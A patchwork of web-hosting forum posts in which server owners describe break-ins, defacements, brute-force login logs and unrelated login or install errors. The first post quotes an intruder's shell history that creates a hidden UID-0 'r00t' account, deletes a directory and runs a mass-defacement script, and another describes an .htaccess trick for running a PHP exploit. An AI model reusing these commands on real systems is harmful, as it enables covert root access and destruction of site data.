All index.php and index.html files on my server have been replaced with the "JaMaYcKa" hackers page. I was reading on WHT, and just about 10 days ago this happened to another member here.
I am using seeksadmin for system administration, and coincidently the guy who was hacked 10 days ago was also using seeksadmin. I believe there was another member here a month ago who was also hacked by "JaMaYcKa", and he was also a seeksadmin customer. I am not blaming seeksadmin in any way, they have helped a lot and I hope they can get this resolved.
Does anyone have any information on how to reverse/fix this issue? I am no system admin, just to put that out there, hence the reason I hired seeksadmin.
Here is the .bash_history from what the "JaMaYcKa" hacker did,
cd / pwd /usr/sbin/useradd -o -u 0 -g 0 r00t -p ****************** passwd r00t rm -rf tmp/ cd tmp ls -a unzip 1.zip perl mass.pl /tmp/index.html exit
According the the history, he ran some mass.pl script which would cause all index.php/html files to be changed (I am assuming). I have already removed the user "r00t" as seen above is what he created.
Any info on how to get this reversed (and if anyone else was using seeksadmin, let me know if they resolved your issue). I am currently waiting for an update from seeksadmin, so I'll update you guys once they reply to the ticket. Also to note I am using whmcs which contained the root password to this server; another user mentioned in another thread that if you were using whmcs/mb/ce/etc a hacker could get your root password, which of course if the password was not encrypted or the script had a glitch, the hacker could easily get your root password.
For those who are still under the softlayer hacker abuse please note you will need to re-load your server. We got hit a 2nd time after thinking everything was clean. Anyhow, for those who got hit again, my team and another from WHT - forgot who made the original clean.php script...
anyhow, here is a tool to clean all the data for all of your users:Copy fixit.pl and clean4.php to a directory. IE: /home/yourusername
Change username "changeme" in fixit.pl to the username where clean4.php is located execute fixit.pl: IE: perl fixit.pl. If you want to test this on one user uncomment the die statement. When you are ready to do the entire server comment the die statement.
i've got a couple of vps accounts and one got hacked today, i received a domain creation email for a domain i didn't create, password was "hackedonlyhost" and contact was not my email but someone elses. Root password was changed etc etc, but i managed to get control of the vps again.
Why am i posting this in the ded forum? because the email in the account setup was for a hosting company. I traced the ip to LT. I've found this guy on a couple of hacker forums (arabic, he's in egypt) also using his email at his hosting company.
So, whilst he may not be breaking LT rules at all do i bother contacting them to say they are providing services to hacker?
There Is Some Way That Hacker use a .htaccess file to change the php Version On The Server To use the Exploit Look I Run A php Shell From My Server [url] You Can See From The picture that my php version is 5.2.6 then I Have upload the .htaccess To My server the Version has been changed look to other picture [url] You Can see The .htaccess file And This Way Only Work If I have More Than one php Version on my server How Can I Secure My server From This Way
I'm still trying to figure this one out. I got an email last night about 10:30pm that a weird IP had logged with root. I thought it was a guy that helps with tech things but I ran the IP... it came back from Korea and I knew I was in trouble. I immediately logged into WHM and changed the root password then sent the server down for a reboot. He was only in there for about 3 minutes before I nailed him. I've banned the IP from the server and have been watching it for nearly 12 hours now and they haven't came back yet.
Now comes the task of trying to figure out how he got the password. This is mind boggling to me. He knew the password, like someone gave it to him... there were no incorrect guesses or brute force. The password was a series of random letters, both upper and lower case. Is it possible he got it through getting to /etc/passwd via a PHP script? I have open basedir restrictions in place, can they get around that? I noticed at the time he logged in there were several IPs trying to exploit PHP scripts on my server, you know, setting the parameters to txt files but I assumed with shell functions disabled (except exec) and with open basedir this wouldn't be possible. Is there a hole in cpanel / PHP / kernel recently I may have missed?
As with many sites. my site was hacked recently. my host was so negative about this. they didn't notice the hack attempt although it took the hacker 9 hours to break through.
after that I made some search on my host to find that it is not a real host at all. they are just resellers to another company. I was very disappointed, Then I decided to go to a better host who can protect me from hackers.
I read some threads about 'hacker safe host' but they all in general don't give a real name of trusted 'anti-hackers' companies.
can you guide me to some of the famous hosts?
if you can't my friends got a VPS hosted with WestHost. he offered me to move my site to his VPS. is west host trusted about hackers?
I was checking my business server's IIS errors logs when I ran across the following error:
2007-05-19 08:21:10 00.000.000.00 2243 00.000.000.000 80 HTTP/1.1 GET
/w00tw00t.at.ISC.SANS.DFind 400 - Hostname -
Additional information about the those responsible for the hack attempts are as follows
(retrieved from domaintools.com):
CustName: ----------------(hidden by me) Address: Private Address City: Plano StateProv: TX PostalCode: 75075 Country: US RegDate: 2005-08-27 Updated: 2005-08-27
Apparently this person was trying to use the dfind hacker tool to find vulnerabilities on my server. The IP address belongs to AT&T Yahoo; and I've already contacted them by email. I believe that subsequent hack attempts have originated from this IP, however, the IP address has been masked by the use of proxies. I think that this may be someone I know because the IP is only about an hours drive from me. I'm starting to suspect a disgruntled former client who has friends living where that IP's from.
Has anyone here had any similar experiences?
What do you think AT&T Yahoo's response will be?
Is there anything else I can do or should not do?
I am also considering reimaging my server because of system issues but I am concerned that would erase any information needed for investigative purposes. I have saved my log files, though, on a CD but I'm thinking that AT&T Yahoo or whoever investigates this needs the server as it is.
Browse to www.mydomain.com/webmail and get login box > login accepted and taken to Horde/Squirrelmail choice screen > choose Squirrelmail and get login box ... login not accepted! > Retry and choose Horde ... login not accepted!
The login is correct and the results are the same when logging in as root, or through /cPanel or /Webmail.
I want to ask about some tips to prevent my blog from hacker attack. My friends experience this and i dont want this happen to me. Is web hosting technical support can fix my host server if hacker break it out?
I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.
Does any tool (for example bash script with grep) exist that would parse the raw apache logs and report if something is suspicious. Apache logs don't show the POST data so I am talking to admin to setup dump_io apache mod that enables this.
Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.
I'm having a problem with a hacker...using insecure scripts on my user's accounts he changes Cpanel passwords. I do not understand how a script running as user nobody would change a Cpanel password. Any ideas on that ?
I am using mod security (rules from gotroot.com), register_globals are disabled. I also disabled the password reset feature as I thought the hacker may be resetting the passwords and then reading the new password from the email account on the server using the insecure script.
Unfortunately this guy simply doesn't stop...he seems to have a reverse DNS list or something. He is only attacking accounts on one specific server of mine but I am pretty sure he doesn't have root access.
It seems like someone has hacked into my server, and all of the pages for one of my domains are showing errors.
Each page on my site is showing a PHP inclusion error, each file on my site is trying to include an unknown file /tmp/blah.php for example which doesn't exist on my site, therefore creating errors and not showing my site.
I checked my site in ftp, it isn't in the code. So it is definitely in a server file somewhere.
What could be doing this? Its for a single domain only, I've created the file it is trying to include as a temporary fix, I have checked php.ini and there seems no reference to the included file there.
my VPS hosted by Strato was hacked and seems to be part of a botnet now. Until now I thought that the automatic backups of the provider would be enough and I did no separate backups using pleskbackup. Unfortunately the hacker attack was earlier than my oldest backup.
Now I want to move the complete server content including the configuration of approx. 10 domains to a new one. Therefore I want to make a backup of the plesk 9.5 server using pleskbackup to import it on the new server running plesk 12.I can access the old server in recovery mode only, which means, that a recovery system runs with the content of the old server mounted under /repair. Is there a possibility to tell pleskbackup, that the content to backup is mounted under /repair? Otherwise it seems, that I have to move the content manually...(I tried starting the old server in normal mode, but it immediately starts doing evil things, so this doesn't seem a good option...)
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server: 1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
through my /var/log/messages file and some guy been trying every username under the sun to login to my server via FTP over a period of 2-3 hours. He wasnt able to gain access, but next time who knows .
Code: Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:13 toria proftpd: toria.xxx (xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'becky' Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bela' Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bella' Nov 19 23:50:13 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bela' Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'ben' Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'bella' Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - FTP session opened. Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'benjamin' Nov 19 23:50:14 toria proftpd: toria.xxx(xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]) - no such user 'ben'
i have changed my servers ssH login port for more security.. After i changed port could'nt login to my server with ssH and i did ask to dedicated company to login my server and they able to login through the specified port by SSH.. But i can't still connect.. This is happened before on my old server.. It is very strange sometimes i can login sometimes can't login but i could'nt login on my new server yet.. I have changed PuTTY i did try SSH Explorer as well and i did try my laptop to login .. Still same can't login.
If they change the port to 22 i will login easyly i know but i should able to login on different port so that is my problem..
im using belkin modem rooter at home to connect internet.. i don't no if it is couse the problem..
Im running Debian Etch as a webserver, on a dell poweredge 2650, it has been working great, and a few months ago it was up a little over 100 days and it just stopped allowing me to login via ssh or ftp or webmin (which uses the linux password file). i couldnt even log in at the console so i just rebooted it (power switch) and then once it came back up it worked fine. and now about 100+ days later its doing the same exact thing. I must note that all the websites on the system are still working fine, apache and mysql have not been affected, however the mail system seems to have stopped again too. Has anyone else ever had this sort of problem?
Running A Windows 2003 Server at co-location. I just looked at my event viewer security log and am stunned to see thousands of Failure Audit logon attempts. They have been trying since Saturday at 9:43pm, till currently. Almost all of them failed, but a few were successfull. All of the successfull attempt appear to be:
I cannot login to Plesk server with admin credentials as it says Error: Access for administrator from address 'xx.xx.xx.xx' is restricted in accordance with IP Access restriction policy currently applied. Also I cannot SSH to server and it says connection refused.
ERROR: Failed to download the package URL...transfer closed with 205 bytes remaining to read..Not all packages were installed.Please try installing packages again later.try installing the packages again.